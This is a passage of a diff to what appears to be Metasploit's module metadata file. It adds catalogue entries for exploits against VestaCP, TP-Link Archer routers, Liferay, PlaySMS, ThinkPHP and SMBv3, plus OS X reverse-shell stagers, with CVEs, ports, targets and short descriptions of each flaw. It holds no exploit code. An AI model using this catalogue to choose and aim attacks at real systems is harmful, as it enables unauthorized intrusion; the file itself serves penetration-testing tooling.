+    "description": "This module exploits an authenticated command injection vulnerability in the v-list-user-backups\n          bash script file in Vesta Control Panel to gain remote code execution as the root user.",
+    "references": [
+      "URL-https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/",
+      "CVE-2020-10808"
+    ],
+    "platform": "Python",
+    "arch": "python",
+    "rport": 8083,
+    "autofilter_ports": [
+      21,
+      2121,
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "ftp",
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-04-16 02:04:17 +0000",
+    "path": "/modules/exploits/linux/http/vestacp_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/vestacp_exec",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "first-attempt-fail"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_linux/http/wanem_exec": {
    "name": "WAN Emulator v2.3 Command Execution",
    "fullname": "exploit/linux/http/wanem_exec",
@@ -63412,6 +63906,63 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/misc/tplink_archer_a7_c7_lan_rce": {
+    "name": "TP-Link Archer A7/C7 Unauthenticated LAN Remote Code Execution",
+    "fullname": "exploit/linux/misc/tplink_archer_a7_c7_lan_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-03-25",
+    "type": "exploit",
+    "author": [
+      "Pedro Ribeiro <pedrib@gmail.com>",
+      "Radek Domanski <radek.domanski <Radek Domanski <radek.domanski@gmail.com> @RabbitPro>"
+    ],
+    "description": "This module exploits a command injection vulnerability in the tdpServer daemon (/usr/bin/tdpServer), running on\n          the router TP-Link Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture, firmware version 190726.\n          The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does\n          not need any authentication to abuse it. After exploitation, an attacker will be able to execute any command\n          as root, including downloading and executing a binary from another host.\n          This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro +\n          Radek Domanski).",
+    "references": [
+      "URL-https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo",
+      "URL-https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/lao_bomb/lao_bomb.md",
+      "URL-https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/lao_bomb.md",
+      "CVE-2020-10882",
+      "CVE-2020-10883",
+      "CVE-2020-10884",
+      "ZDI-20-334",
+      "ZDI-20-335",
+      "ZDI-20-336"
+    ],
+    "platform": "Linux",
+    "arch": "mipsbe",
+    "rport": 20002,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726)"
+    ],
+    "mod_time": "2020-04-16 02:04:17 +0000",
+    "path": "/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/misc/tplink_archer_a7_c7_lan_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/misc/ueb9_bpserverd": {
    "name": "Unitrends UEB bpserverd authentication bypass RCE",
    "fullname": "exploit/linux/misc/ueb9_bpserverd",
@@ -64917,7 +65468,7 @@
      "Unix In-Memory",
      "Linux Dropper"
    ],
-    "mod_time": "2020-02-19 01:06:50 +0000",
+    "mod_time": "2020-04-12 20:10:17 +0000",
    "path": "/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/upnp/belkin_wemo_upnp_exec",
@@ -71135,7 +71686,7 @@
      "Unix In-Memory",
      "Java Dropper"
    ],
-    "mod_time": "2020-02-19 01:06:50 +0000",
+    "mod_time": "2020-04-10 04:09:17 +0000",
    "path": "/modules/exploits/multi/http/jenkins_metaprogramming.rb",
    "is_install_path": true,
    "ref_name": "multi/http/jenkins_metaprogramming",
@@ -71537,6 +72088,69 @@
    },
    "needs_cleanup": null
  },
+  "exploit_multi/http/liferay_java_unmarshalling": {
+    "name": "Liferay Portal Java Unmarshalling via JSONWS RCE",
+    "fullname": "exploit/multi/http/liferay_java_unmarshalling",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-11-25",
+    "type": "exploit",
+    "author": [
+      "Markus Wulftange",
+      "Thomas Etrillard",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits a Java unmarshalling vulnerability via JSONWS in\n          Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1\n          GA2 to execute code as the Liferay user. Tested against 7.2.0 GA1.",
+    "references": [
+      "CVE-2020-7961",
+      "URL-https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html",
+      "URL-https://www.synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html",
+      "URL-https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271"
+    ],
+    "platform": "Java",
+    "arch": "java",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2"
+    ],
+    "mod_time": "2020-04-22 10:44:07 +0000",
+    "path": "/modules/exploits/multi/http/liferay_java_unmarshalling.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/liferay_java_unmarshalling",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_multi/http/log1cms_ajax_create_folder": {
    "name": "Log1 CMS writeInfo() PHP Code Injection",
    "fullname": "exploit/multi/http/log1cms_ajax_create_folder",
@@ -74655,6 +75269,57 @@
    },
    "needs_cleanup": null
  },
+  "exploit_multi/http/playsms_template_injection": {
+    "name": "PlaySMS index.php Unauthenticated Template Injection Code Execution",
+    "fullname": "exploit/multi/http/playsms_template_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-02-05",
+    "type": "exploit",
+    "author": [
+      "Touhid M.Shaikh <touhidshaikh22@gmail.com>",
+      "Lucas Rosevear"
+    ],
+    "description": "This module exploits a preauth Server-Side Template Injection vulnerability that leads to remote code execution\n          in PlaySMS before version 1.4.3. This issue is caused by double processing a server-side template with a custom\n          PHP template system called 'TPL' which is used in the PlaySMS template engine at\n          `src/Playsms/Tpl.php:_compile()`. The vulnerability is triggered when an attacker supplied username with a\n          malicious payload is submitted. This malicious payload is then stored in a TPL template which when rendered a\n          second time, results in code execution.\n          The TPL(https://github.com/antonraharja/tpl) template language is vulnerable to PHP code injection.\n\n          This module was tested against PlaySMS 1.4 on HackTheBox's Forlic Machine.",
+    "references": [
+      "CVE-2020-8644",
+      "URL-https://www.youtube.com/watch?v=zu-bwoAtTrc",
+      "URL-https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PlaySMS Before 1.4.3"
+    ],
+    "mod_time": "2020-04-03 09:51:24 +0000",
+    "path": "/modules/exploits/multi/http/playsms_template_injection.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/playsms_template_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_multi/http/playsms_uploadcsv_exec": {
    "name": "PlaySMS import.php Authenticated CSV File Upload Code Execution",
    "fullname": "exploit/multi/http/playsms_uploadcsv_exec",
@@ -83253,7 +83918,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-04-02 11:30:59 +0000",
+    "mod_time": "2020-04-16 02:04:17 +0000",
    "path": "/modules/exploits/osx/local/vmware_fusion_lpe.rb",
    "is_install_path": true,
    "ref_name": "osx/local/vmware_fusion_lpe",
@@ -84372,6 +85037,46 @@
    },
    "needs_cleanup": null
  },
+  "exploit_unix/fileformat/metasploit_libnotify_cmd_injection": {
+    "name": "Metasploit Libnotify Plugin Arbitrary Command Execution",
+    "fullname": "exploit/unix/fileformat/metasploit_libnotify_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-03-04",
+    "type": "exploit",
+    "author": [
+      "pasta <jaguinaga@faradaysec.com>"
+    ],
+    "description": "This module exploits a shell command injection vulnerability in the\n        libnotify plugin. This vulnerability affects Metasploit versions\n        5.0.79 and earlier.",
+    "references": [
+      "CVE-2020-7350",
+      "URL-https://github.com/rapid7/metasploit-framework/issues/13026"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-04-16 16:00:56 +0000",
+    "path": "/modules/exploits/unix/fileformat/metasploit_libnotify_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "unix/fileformat/metasploit_libnotify_cmd_injection",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_unix/ftp/proftpd_133c_backdoor": {
    "name": "ProFTPD-1.3.3c Backdoor Command Execution",
    "fullname": "exploit/unix/ftp/proftpd_133c_backdoor",
@@ -85628,7 +86333,7 @@
    "targets": [
      "OpenSMTPD < 6.6.4 (automatic grammar selection)"
    ],
-    "mod_time": "2020-03-03 16:50:39 +0000",
+    "mod_time": "2020-04-10 02:01:15 +0000",
    "path": "/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb",
    "is_install_path": true,
    "ref_name": "unix/local/opensmtpd_oob_read_lpe",
@@ -86081,7 +86786,7 @@
    "targets": [
      "@(#)version.c       5.51 (Berkeley) 5/2/86"
    ],
-    "mod_time": "2020-02-05 19:13:19 +0000",
+    "mod_time": "2020-04-10 02:01:15 +0000",
    "path": "/modules/exploits/unix/smtp/morris_sendmail_debug.rb",
    "is_install_path": true,
    "ref_name": "unix/smtp/morris_sendmail_debug",
@@ -86123,7 +86828,7 @@
    "targets": [
      "OpenSMTPD < 6.6.1"
    ],
-    "mod_time": "2020-03-05 14:48:37 +0000",
+    "mod_time": "2020-04-22 10:44:07 +0000",
    "path": "/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb",
    "is_install_path": true,
    "ref_name": "unix/smtp/opensmtpd_mail_from_rce",
@@ -91036,6 +91741,68 @@
    },
    "needs_cleanup": true
  },
+  "exploit_unix/webapp/thinkphp_rce": {
+    "name": "ThinkPHP Multiple PHP Injection RCEs",
+    "fullname": "exploit/unix/webapp/thinkphp_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2018-12-10",
+    "type": "exploit",
+    "author": [
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits one of two PHP injection vulnerabilities in the\n          ThinkPHP web framework to execute code as the web user.\n\n          Versions up to and including 5.0.23 are exploitable, though 5.0.23 is\n          vulnerable to a separate vulnerability. The module will automatically\n          attempt to detect the version of the software.\n\n          Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.",
+    "references": [
+      "CVE-2018-20062",
+      "CVE-2019-9082",
+      "URL-https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce",
+      "URL-https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2020-04-22 10:44:07 +0000",
+    "path": "/modules/exploits/unix/webapp/thinkphp_rce.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/thinkphp_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_unix/webapp/tikiwiki_graph_formula_exec": {
    "name": "TikiWiki tiki-graph_formula Remote PHP Code Execution",
    "fullname": "exploit/unix/webapp/tikiwiki_graph_formula_exec",
@@ -92507,7 +93274,7 @@
    "targets": [
      "InfiniteWP Client < 1.9.4.5"
    ],
-    "mod_time": "2020-03-03 13:22:01 +0000",
+    "mod_time": "2020-04-08 00:50:28 +0000",
    "path": "/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_infinitewp_auth_bypass",
@@ -92877,7 +93644,7 @@
    "targets": [
      "WordPress 4.6 / Exim"
    ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2020-04-12 20:10:17 +0000",
    "path": "/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_phpmailer_host_header",
@@ -119033,7 +119800,7 @@
      "Windows Dropper",
      "PowerShell Stager"
    ],
-    "mod_time": "2020-03-13 17:36:05 +0000",
+    "mod_time": "2020-04-12 20:10:17 +0000",
    "path": "/modules/exploits/windows/http/desktopcentral_deserialization.rb",
    "is_install_path": true,
    "ref_name": "windows/http/desktopcentral_deserialization",
@@ -119041,7 +119808,6 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
-      "PatchedVersion": "100474",
      "Stability": [
        "service-resource-loss"
      ],
@@ -129303,6 +130069,55 @@
    },
    "needs_cleanup": true
  },
+  "exploit_windows/local/cve_2020_0796_smbghost": {
+    "name": "SMBv3 Compression Buffer Overflow",
+    "fullname": "exploit/windows/local/cve_2020_0796_smbghost",
+    "aliases": [
+
+    ],
+    "rank": 400,
+    "disclosure_date": "2020-03-13",
+    "type": "exploit",
+    "author": [
+      "Daniel García Gutiérrez",
+      "Manuel Blanco Parajón",
+      "Spencer McIntyre"
+    ],
+    "description": "A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to\n            execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself\n            before injecting a payload into winlogon.exe.",
+    "references": [
+      "CVE-2020-0796",
+      "URL-https://github.com/danigargu/CVE-2020-0796",
+      "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows 10 v1903-1909 x64"
+    ],
+    "mod_time": "2020-04-16 02:04:17 +0000",
+    "path": "/modules/exploits/windows/local/cve_2020_0796_smbghost.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/cve_2020_0796_smbghost",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-os-restarts"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/local/ikeext_service": {
    "name": "IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL",
    "fullname": "exploit/windows/local/ikeext_service",
@@ -131375,22 +132190,24 @@
    },
    "needs_cleanup": true
  },
-  "exploit_windows/local/trusted_service_path": {
-    "name": "Windows Service Trusted Path Privilege Escalation",
-    "fullname": "exploit/windows/local/trusted_service_path",
+  "exploit_windows/local/unquoted_service_path": {
+    "name": "Windows Unquoted Service Path Privilege Escalation",
+    "fullname": "exploit/windows/local/unquoted_service_path",
    "aliases": [
-
+      "exploits/windows/local/trusted_service_path"
    ],
    "rank": 600,
    "disclosure_date": "2001-10-25",
    "type": "exploit",
    "author": [
-      "sinn3r <sinn3r@metasploit.com>"
+      "sinn3r <sinn3r@metasploit.com>",
+      "h00die"
    ],
-    "description": "This module exploits a logic flaw due to how the lpApplicationName parameter\n        is handled.  When the lpApplicationName contains a space, the file name is\n        ambiguous.  Take this file path as example: C:\\program files\\hello.exe;\n        The Windows API will try to interpret this as two possible paths:\n        C:\\program.exe, and C:\\program files\\hello.exe, and then execute all of them.\n        To some software developers, this is an unexpected behavior, which becomes a\n        security problem if an attacker is able to place a malicious executable in one\n        of these unexpected paths, sometimes escalate privileges if run as SYSTEM.\n        Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the\n        same problem.\n\n        The offensive technique is also described in Writing Secure Code (2nd Edition),\n        Chapter 23, in the section \"Calling Processes Security\" on page 676.",
+    "description": "This module exploits a logic flaw due to how the lpApplicationName parameter\n        is handled.  When the lpApplicationName contains a space, the file name is\n        ambiguous.  Take this file path as example: C:\\program files\\hello.exe;\n        The Windows API will try to interpret this as two possible paths:\n        C:\\program.exe, and C:\\program files\\hello.exe, and then execute all of them.\n        To some software developers, this is an unexpected behavior, which becomes a\n        security problem if an attacker is able to place a malicious executable in one\n        of these unexpected paths, sometimes escalate privileges if run as SYSTEM.\n        Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the\n        same problem.\n\n        The offensive technique is also described in Writing Secure Code (2nd Edition),\n        Chapter 23, in the section \"Calling Processes Security\" on page 676.\n\n        This technique was previously called Trusted Service Path, but is more commonly\n        known as Unquoted Service Path.\n\n        The service exploited won't start until the payload written to disk is removed.\n        Manual cleanup is required.",
    "references": [
      "URL-http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx",
-      "URL-http://www.microsoft.com/learning/en/us/book.aspx?id=5957&locale=en-us"
+      "URL-http://www.microsoft.com/learning/en/us/book.aspx?id=5957&locale=en-us",
+      "URL-https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae"
    ],
    "platform": "Windows",
    "arch": "",
@@ -131404,14 +132221,24 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
-    "path": "/modules/exploits/windows/local/trusted_service_path.rb",
+    "mod_time": "2020-04-11 12:47:53 +0000",
+    "path": "/modules/exploits/windows/local/unquoted_service_path.rb",
    "is_install_path": true,
-    "ref_name": "windows/local/trusted_service_path",
+    "ref_name": "windows/local/unquoted_service_path",
    "check": true,
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
    },
    "needs_cleanup": true
  },
@@ -138578,7 +139405,7 @@
      "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)",
      "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)"
    ],
-    "mod_time": "2020-01-12 08:19:44 +0000",
+    "mod_time": "2020-04-20 20:06:52 +0000",
    "path": "/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/rdp/cve_2019_0708_bluekeep_rce",
@@ -141335,7 +142162,7 @@
    "targets": [
      "Windows 7 and Server 2008 R2 (x64) All Service Packs"
    ],
-    "mod_time": "2020-03-09 09:22:01 +0000",
+    "mod_time": "2020-04-20 20:06:52 +0000",
    "path": "/modules/exploits/windows/smb/ms17_010_eternalblue.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms17_010_eternalblue",
@@ -141444,7 +142271,7 @@
      "Native upload",
      "MOF upload"
    ],
-    "mod_time": "2019-10-30 22:20:36 +0000",
+    "mod_time": "2020-04-20 20:06:52 +0000",
    "path": "/modules/exploits/windows/smb/ms17_010_psexec.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms17_010_psexec",
@@ -142547,7 +143374,7 @@
      "Windows 2000 Pro English All",
      "Windows XP Pro SP0/SP1 English"
    ],
-    "mod_time": "2020-03-05 14:48:37 +0000",
+    "mod_time": "2020-04-16 02:04:17 +0000",
    "path": "/modules/exploits/windows/telnet/goodtech_telnet.rb",
    "is_install_path": true,
    "ref_name": "windows/telnet/goodtech_telnet",
@@ -146792,7 +147619,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-10-13 17:04:00 +0000",
+    "mod_time": "2020-04-16 15:35:38 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_python",
@@ -146825,7 +147652,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-06-25 20:42:35 +0000",
+    "mod_time": "2020-04-16 16:03:14 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_python_ssl",
@@ -152701,7 +153528,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-01-10 15:06:08 +0000",
+    "mod_time": "2020-04-22 16:34:01 +0000",
    "path": "/modules/payloads/stagers/osx/x64/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/dupandexecve/reverse_tcp",
@@ -152712,6 +153539,40 @@
    },
    "needs_cleanup": false
  },
+  "payload_osx/x64/dupandexecve/reverse_tcp_uuid": {
+    "name": "OS X dup2 Command Shell, Reverse TCP Stager with UUID Support (OSX x64)",
+    "fullname": "payload/osx/x64/dupandexecve/reverse_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "nemo",
+      "timwr"
+    ],
+    "description": "dup2 socket in edi, then execve. Connect back to the attacker with UUID Support (OSX x64)",
+    "references": [
+
+    ],
+    "platform": "OSX",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-04-22 16:34:01 +0000",
+    "path": "/modules/payloads/stagers/osx/x64/reverse_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "osx/x64/dupandexecve/reverse_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "payload_osx/x64/exec": {
    "name": "OS X x64 Execute Command",
    "fullname": "payload/osx/x64/exec",
@@ -152809,7 +153670,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-01-10 15:06:08 +0000",
+    "mod_time": "2020-04-22 16:34:01 +0000",
    "path": "/modules/payloads/stagers/osx/x64/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter/reverse_tcp",
@@ -152820,6 +153681,42 @@
    },
    "needs_cleanup": false
  },
+  "payload_osx/x64/meterpreter/reverse_tcp_uuid": {
+    "name": "OSX Meterpreter, Reverse TCP Stager with UUID Support (OSX x64)",
+    "fullname": "payload/osx/x64/meterpreter/reverse_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "parchedmind",
+      "nologic",
+      "timwr"
+    ],
+    "description": "Inject the mettle server payload (staged). Connect back to the attacker with UUID Support (OSX x64)",
+    "references": [
+      "URL-https://github.com/CylanceVulnResearch/osx_runbin",
+      "URL-https://github.com/nologic/shellcc"
+    ],
+    "platform": "OSX",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-04-22 16:34:01 +0000",
+    "path": "/modules/payloads/stagers/osx/x64/reverse_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "osx/x64/meterpreter/reverse_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "payload_osx/x64/meterpreter_reverse_http": {
    "name": "OSX Meterpreter, Reverse HTTP Inline",
    "fullname": "payload/osx/x64/meterpreter_reverse_http",
@@ -154012,7 +154909,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
    "path": "/modules/payloads/stagers/python/bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter/bind_tcp",
@@ -154046,7 +154943,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
    "path": "/modules/payloads/stagers/python/bind_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter/bind_tcp_uuid",
@@ -154079,7 +154976,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-10-10 22:08:26 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
    "path": "/modules/payloads/stagers/python/reverse_http.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter/reverse_http",
@@ -154112,7 +155009,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-10-10 22:08:26 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
    "path": "/modules/payloads/stagers/python/reverse_https.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter/reverse_https",
@@ -154145,7 +155042,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
    "path": "/modules/payloads/stagers/python/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter/reverse_tcp",
@@ -154180,7 +155077,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
    "path": "/modules/payloads/stagers/python/reverse_tcp_ssl.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter/reverse_tcp_ssl",
@@ -154214,7 +155111,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
    "path": "/modules/payloads/stagers/python/reverse_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter/reverse_tcp_uuid",
@@ -154247,7 +155144,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-11 15:41:04 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
    "path": "/modules/payloads/singles/python/meterpreter_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter_bind_tcp",
@@ -154280,7 +155177,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-10-10 22:08:26 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
    "path": "/modules/payloads/singles/python/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter_reverse_http",
@@ -154313,7 +155210,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-10-10 22:08:26 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
    "path": "/modules/payloads/singles/python/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter_reverse_https",
@@ -154346,7 +155243,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-11 15:41:04 +0000",
+    "mod_time": "2020-04-21 16:06:36 +0000",
    "path": "/modules/payloads/singles/python/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter_reverse_tcp",
@@ -166561,7 +167458,7 @@
      "zhangyoufu",
      "justingist"
    ],
-    "description": "On an Ubiquiti UniFi controller, reads the system.properties configuration file\n        and downloads the backup and autobackup files.  The files are then decrypted using\n        a known encryption key, then attempted to be repaired by zip.  Meterpreter must be\n        used due to the large file sizes, which can be flaky on regular shells to read.\n        Confirmed to work on 5.10.19 - 5.10.23, but most likely quite a bit more.",
+    "description": "On an Ubiquiti UniFi controller, reads the system.properties configuration file\n        and downloads the backup and autobackup files.  The files are then decrypted using\n        a known encryption key, then attempted to be repaired by zip.  Meterpreter must be\n        used due to the large file sizes, which can be flaky on regular shells to read.\n        Confirmed to work on 5.10.19 - 5.10.23, but most likely quite a bit more.\n        If the zip can be repaired, the db and its information will be extracted.",
    "references": [
